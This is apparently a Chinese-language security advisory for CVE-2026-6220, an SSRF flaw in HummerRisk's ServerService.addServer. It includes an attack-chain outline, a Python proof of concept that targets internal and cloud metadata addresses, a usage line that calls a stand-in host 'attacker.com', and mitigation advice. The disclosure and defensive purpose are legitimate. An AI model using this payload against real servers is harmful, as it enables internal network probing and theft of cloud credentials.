IPBUF安全漏洞报告
English
CVE-2026-6220 CVSS 4.7 中危

CVE-2026-6220 HummerRisk服务端请求伪造漏洞

披露日期: 2026-04-13

漏洞信息

漏洞编号
CVE-2026-6220
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
4.7 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
HummerRisk

相关标签

SSRFHummerRisk服务端请求伪造中危CVE-2026-6220

漏洞概述

HummerRisk在1.5.0及之前的版本中存在安全漏洞。该漏洞位于视频文件下载URL处理组件的ServerService.addServer函数中。由于对参数streamIp缺乏严格的验证,攻击者可以通过构造恶意请求触发服务端请求伪造(SSRF)。该攻击可远程发起,且利用代码已公开,供应商尚未对此作出回应,存在一定的安全风险。

技术细节

该漏洞主要影响HummerRisk系统的视频文件下载URL处理模块。具体技术细节在于ServerService.java文件中的addServer函数存在输入验证缺失问题。该函数直接使用了用户提供的streamIp参数来构建服务器端请求,而未对该参数的格式、目标地址范围进行足够的校验。攻击者若拥有较高权限账户,可利用此缺陷构造恶意数据包,诱导服务器向攻击者指定的任意地址发送请求(SSRF)。这种攻击方式常被用于探测内网拓扑、扫描内网端口或结合其他漏洞进行进一步的攻击。尽管CVSS评分属于中危,但由于漏洞利用代码已公开且厂商未响应,其潜在威胁不容忽视。

攻击链分析

STEP 1
1. 获取权限
攻击者需要获取HummerRisk系统的高权限账户(PR:H),通常通过网络钓鱼或利用其他低危漏洞。
STEP 2
2. 构造Payload
攻击者构造包含恶意streamIp参数的请求数据,目标指向内网敏感地址(如127.0.0.1)或外部回调地址。
STEP 3
3. 发送恶意请求
攻击者向ServerService.addServer接口发送特制的HTTP请求,触发漏洞。
STEP 4
4. 执行SSRF
服务器端解析请求,向攻击者指定的streamIp发起连接,导致信息泄露或内网探测。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_ssrf(target_url, attacker_controlled_ip): """ PoC for CVE-2026-6220 Demonstrates SSRF via streamIp parameter in ServerService.addServer. Requires High Privileges (PR:H). """ headers = { "Content-Type": "application/json", # "Cookie": "session_id=..." # Authenticated session needed } # Malicious payload targeting internal metadata service or arbitrary IP payload = { "serverName": "ExploitTest", "streamIp": attacker_controlled_ip, # e.g., "127.0.0.1" or "http://169.254.169.254" "streamPort": 80 } try: # Endpoint is hypothetical based on component name "ServerService" response = requests.post(f"{target_url}/api/server/add", json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully. Server may have requested: {attacker_controlled_ip}") else: print(f"[-] Server returned status: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") # Usage # check_ssrf("http://127.0.0.1:8080", "http://attacker.com/burp")

影响范围

HummerRisk <= 1.5.0

防御指南

临时缓解措施
由于供应商目前尚未响应,建议暂时禁用受影响的功能模块(视频文件下载URL处理),并在网络防火墙中严格限制HummerRisk服务器的出站连接范围,仅允许业务必需的外部通信。同时,应加强对系统日志的监控,及时发现异常的出站请求。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表